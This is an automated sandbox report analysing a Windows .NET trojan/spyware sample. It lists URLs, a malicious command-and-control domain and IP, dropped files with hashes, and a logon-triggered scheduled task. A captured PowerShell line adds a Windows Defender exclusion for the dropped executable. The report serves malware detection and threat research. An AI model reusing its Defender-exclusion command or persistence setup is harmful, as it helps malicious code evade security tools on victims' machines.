http://www.galapagosdesign.com/staff/dennis.htm | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0n | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.yandex.comsocks= | g94e4BgSRN.exe, 00000000.00000002.286467177.00000000026AB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.287524308.0000000003873000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.282165749.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000002.516753076.0000000000400000.00000040.00000001.sdmp, g94e4BgSRN.exe, 00000009.00000000.276611463.0000000000400000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.jiyu-kobo.co.jp/0 | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/n-u | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fonts.comn | g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246471898.000000000580B000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/Y0 | g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.comceTFp | g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ascendercorp.com/typedesigners.html | g94e4BgSRN.exe, 00000000.00000003.250994241.00000000057FB000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.como.2K- | g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fonts.com | g94e4BgSRN.exe, 00000000.00000003.246496422.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246436621.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.246372251.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.sandoll.co.kr | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249133388.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249210789.000000000582D000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | g94e4BgSRN.exe, 00000000.00000002.286586670.0000000002762000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.286410302.0000000002631000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.como. | g94e4BgSRN.exe, 00000000.00000003.249228910.00000000057FE000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com | g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | false | | high
http://www.carterandcone.comTC | g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.yandex.com | g94e4BgSRN.exe | false | | high
http://www.jiyu-kobo.co.jp/jp/ | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coma | g94e4BgSRN.exe, 00000000.00000003.285409277.00000000057F0000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000002.289129880.00000000057F0000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.founder.com.cn/cn | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.come | g94e4BgSRN.exe, 00000000.00000003.251756053.00000000057F4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.como.)K | g94e4BgSRN.exe, 00000000.00000003.249726189.000000000582E000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.249251425.000000000582D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.jiyu-kobo.co.jp/ | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/k | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | g94e4BgSRN.exe, 00000000.00000002.289320664.0000000006A82000.00000004.00000001.sdmp | false | | high
http://www.jiyu-kobo.co.jp/f | g94e4BgSRN.exe, 00000000.00000003.250578288.00000000057F9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comlar? | g94e4BgSRN.exe, 00000000.00000003.247402628.000000000580B000.00000004.00000001.sdmp, g94e4BgSRN.exe, 00000000.00000003.247429610.000000000580B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.founder.com.cn/cn) | g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn# | g94e4BgSRN.exe, 00000000.00000003.248047122.00000000057FD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
109.205.178.244 | podzeye.duckdns.org | Germany | 12586 | ASGHOSTNETDE | true

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553285
                                              Start date:14.01.2022
                                              Start time:15:54:16
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 8m 56s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:g94e4BgSRN.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:32
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@9/8@1/1
                                              EGA Information:
                                              • Successful, ratio: 50%
                                              HDC Information:
                                              • Successful, ratio: 2.8% (good quality ratio 1.4%)
                                              • Quality average: 38.5%
                                              • Quality standard deviation: 41.8%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 36
                                              • Number of non-executed functions: 33
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                              • Execution Graph export aborted for target g94e4BgSRN.exe, PID 6976 because it is empty
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time     | Type            | Description
                                              15:55:22 | API Interceptor | 2x Sleep call for process: g94e4BgSRN.exe modified
                                              15:55:26 | API Interceptor | 30x Sleep call for process: powershell.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              Match           | Associated Sample Name / URL | Detection | Context
                                              109.205.178.244 | IMAGE0113.exe                | malicious |
                                                              | QgArQOctY9.exe               | malicious |
                                                              | Fwm9y3IpiQ.exe               | malicious |
                                                              | fIjqTjnGW1.exe               | malicious |
                                                              | SRV7387387.exe               | malicious |

                                                        Domains

                                                        Match               | Associated Sample Name / URL | Detection | Context
                                                        podzeye.duckdns.org | IMAGE0113.exe                | malicious | 109.205.178.244
                                                                            | QgArQOctY9.exe               | malicious | 109.205.178.244
                                                                            | Fwm9y3IpiQ.exe               | malicious | 109.205.178.244
                                                                            | fIjqTjnGW1.exe               | malicious | 109.205.178.244
                                                                            | SRV7387387.exe               | malicious | 109.205.178.244
                                                                            | PO1104994.exe                | malicious | 143.198.42.214
                                                                            | qjSBvGbPyK.exe               | malicious | 144.126.145.38
                                                                            | IMG0038.exe                  | malicious | 194.233.74.91
                                                                            | IMAGE00037.exe               | malicious | 178.18.247.188
                                                                            | INV9938929.exe               | malicious | 178.18.247.188
                                                                            | Rechnung.exe                 | malicious | 79.134.225.39
                                                                            | UFvnU6nahx.exe               | malicious | 79.134.225.39
                                                                            | MzMb9GHlQQ.exe               | malicious | 79.134.225.39
                                                                            | Rc93GKN1MJ.exe               | malicious | 138.197.161.207
                                                                            | Image0017.exe                | malicious | 138.197.161.207
                                                                            | Image009.exe                 | malicious | 194.5.98.64
                                                                            | WwTSpI2hvx.exe               | malicious | 62.128.217.91
                                                                            | ibgcrnNmhB.exe               | malicious | 105.112.25.130
                                                                            | INV9938884.exe               | malicious | 154.118.49.103

                                                        ASN

                                                        Match        | Associated Sample Name / URL                      | Detection | Context
                                                        ASGHOSTNETDE | 00B5C410D204D6A92F6636E23998777D2716E8928F96B.exe | malicious | 5.230.70.102
                                                                     | VmIzagkjCN.exe                                    | malicious | 5.230.70.102
                                                                     | 2N9a9kQBFI.exe                                    | malicious | 5.230.67.58
                                                                     | ZMeGwXn01C.exe                                    | malicious | 5.230.67.58
                                                                     | GLS7GMyx7X.exe                                    | malicious | 5.230.67.58
                                                                     | QZmwyW1zrW                                        | malicious | 5.175.146.218
                                                                     | 28043B9D96A6D54044950BCA23633AB601DCFDBE4305B.exe | malicious | 5.230.67.58
                                                                     | jKira.x86                                         | malicious | 5.230.200.189
                                                                     | k8i7NOaW5v.exe                                    | malicious | 5.230.71.130
                                                                     | y0DDiCq3yu.exe                                    | malicious | 5.230.69.22
                                                                     | setup___pass_1234_activ.exe                       | malicious | 5.230.69.22
                                                                     | OGzexXUPE6.exe                                    | malicious | 5.230.72.136
                                                                     | RPf57m26YR.exe                                    | malicious | 5.230.72.136
                                                                     | IMAGE0113.exe                                     | malicious | 109.205.178.244
                                                                     | NXp5nKLotA                                        | malicious | 193.187.23.242
                                                                     | xn0eC7abrG                                        | malicious | 94.249.139.110
                                                                     | 1TJlbC5y7V                                        | malicious | 5.230.200.181
                                                                     | CRokHpfu6U                                        | malicious | 185.57.25.44
                                                                     | 6ItFV4CEi3                                        | malicious | 94.249.139.160
                                                                     | QgArQOctY9.exe                                    | malicious | 109.205.178.244

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\g94e4BgSRN.exe.log
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1396
                                                        Entropy (8bit):5.340178659145498
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4KnKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4l:MIHK5HKXE1qHbHKnYHKhQnoPtHoxHhA9
                                                        MD5:200C45B4371C42E1EC65243C1288751B
                                                        SHA1:D381B575CBD94379873AA43DB07ED18BC6150C1A
                                                        SHA-256:953799E8B658D0797E82466EB482E238F9F73326F5B91D0503D3591DB58ED236
                                                        SHA-512:AAE09F52FAB534CDAC85BBD0A976BC01EDB7C958A0C1FB9C78BC76C82A24ACFBA7741001DB75ECED65309BA3799FCB526EBF9DA74CC3AAE0DB689CA0FF6EE892
                                                        Malicious:true
                                                        Reputation:moderate, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e08
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):22280
                                                        Entropy (8bit):5.345158041308615
                                                        Encrypted:false
                                                        SSDEEP:384:z7tCDbeFrFiyHmz4sUunFrnVLf1JNcLnudlu5cuOhhjm1dOG06JaC:2eqrnln9XSrudl8cugjqB
                                                        MD5:7C2AF9AA7FC1BDF2B8BE132BFDEC1399
                                                        SHA1:70F809B8D4876D06AEAB6ADF1A9780BF0125134A
                                                        SHA-256:7DB5A3A99C17034A683F86EFFFB77073B9247DFFBD9E648AF78EB62E10E47003
                                                        SHA-512:49D5B634906670248C726F38C4D786AF89522ADFE976678A26F2DD8D890951BE40E285174BFFC1CA7D265DAA5E152879548A6504039359EF82548B440248478A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview: @...e...........z.......h.P...........M...J..........@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrftyazc.eg3.ps1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: 1
                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wv32y10w.3up.psm1
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:very short file (no magic)
                                                        Category:dropped
                                                        Size (bytes):1
                                                        Entropy (8bit):0.0
                                                        Encrypted:false
                                                        SSDEEP:3:U:U
                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: 1
                                                        C:\Users\user\AppData\Local\Temp\tmp2A91.tmp
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:XML 1.0 document, ASCII text
                                                        Category:dropped
                                                        Size (bytes):1600
                                                        Entropy (8bit):5.133278056985278
                                                        Encrypted:false
                                                        SSDEEP:24:2di4+S2qh/a1Kby1moqUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtuxvn:cgeCaYrFdOFzOzN33ODOiDdKrsuTiv
                                                        MD5:74F8CF7052E31844E3352158FDC16419
                                                        SHA1:C86BF805FF74DF95045D87EEF800BB3F31088527
                                                        SHA-256:61B51A73F187A78F74AD533C8057C809173351B534B7FB90F5ED69FFFF117522
                                                        SHA-512:8C2C3FE1C6A1DCF32EF574DC61CFF031DCEE30BFA8BF2E61ACBCF1E22D0889756F094D7A826CEB5273A65EAD33C5A8B35A6ED9CA545D25C18E60BC71000E8A3A
                                                        Malicious:true
                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                                        C:\Users\user\AppData\Roaming\SiEKNQVnm.exe
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):898560
                                                        Entropy (8bit):6.874832837426071
                                                        Encrypted:false
                                                        SSDEEP:24576:t6vaGtDTmitq1QqEGNCN/uVKTPLZsLkbR:tJGtOitq1QqFNGZTPWLE
                                                        MD5:D058C6416284F291D6BC7E183293DA1F
                                                        SHA1:9FE97AD0C11997B7C0CA5A43AFF43CC8BDB915B6
                                                        SHA-256:C47C4A57E7521C6886CA3764B32AD1E5D8669F2FBF6B127FE7A832F1F3B74EC5
                                                        SHA-512:13F733FC99E5FAEB274DD1480620194E88BE23D70FDC108C3846CF471760A21AC8606364ED930A187B62EBEDC25124488CB0557D1CED271AF982D50F52FC25CD
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0......"........... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text........ ...................... ..`.rsrc............ ..................@..@.reloc..............................@..B.......................H.......................p...............................................>..(...+.o(....*.0.............Y.+..*....0...................+...+..*..().......}.....~....%.X.....}.....s*...%.o+....}....*..().......{....}......{....}......{....(...+}....*..0..@.........{....~....%-.&~..........s,...%.....(...+(...+.{....(...+.+..*.0............{.....o0....+..*...0............{....(...+.+..*....0............{....o1....+..*>..{.....o2....*....0..&........r...p.{..........{.........(3..
                                                        C:\Users\user\AppData\Roaming\SiEKNQVnm.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\g94e4BgSRN.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:false
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\Documents\20220114\PowerShell_transcript.305090.zsWXEWae.20220114155525.txt
                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):5795
                                                        Entropy (8bit):5.392253149129379
                                                        Encrypted:false
                                                        SSDEEP:96:BZO/fNnqDo1ZyZL/fNnqDo1ZRFfdjZ5/fNnqDo1ZfkNNDZo:r
                                                        MD5:A710E87EA4269CD157E421251E3052D7
                                                        SHA1:6FAF0121B75D400CDB4C8090989E93A6F3F50B7A
                                                        SHA-256:99BA73487367ACF1331EC08FFCD57E2565E37828AC3376BC16B50417AE998EB8
                                                        SHA-512:67D7F38C716ABA229FC7681D4641E24454A226C965C699B8DEA30452B9F50264D5EA0C16C0834744B3F3B042657EE4F21F32359E7EA41A237A0D033CEA2A3DF5
                                                        Malicious:false
                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114155526..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 305090 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\SiEKNQVnm.exe..Process ID: 6780..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114155526..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\SiEKNQVnm.exe..**********************..Windows PowerShell transcript start..Start time: 20220114155929..Username: computer\user..RunAs User: computer\a

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):6.874832837426071
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:g94e4BgSRN.exe
                                                        File size:898560
                                                        MD5:d058c6416284f291d6bc7e183293da1f
                                                        SHA1:9fe97ad0c11997b7c0ca5a43aff43cc8bdb915b6
                                                        SHA256:c47c4a57e7521c6886ca3764b32ad1e5d8669f2fbf6b127fe7a832f1f3b74ec5
                                                        SHA512:13f733fc99e5faeb274dd1480620194e88be23d70fdc108c3846cf471760a21ac8606364ed930a187b62ebedc25124488cb0557d1ced271af982d50f52fc25cd
                                                        SSDEEP:24576:t6vaGtDTmitq1QqEGNCN/uVKTPLZsLkbR:tJGtOitq1QqFNGZTPWLE
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0......"........... ........@.. ....................................@................................

                                                        File Icon

                                                        Icon Hash:14b29272d9cce45b

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x49b00a
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x61DB92BE [Mon Jan 10 01:58:22 2022 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
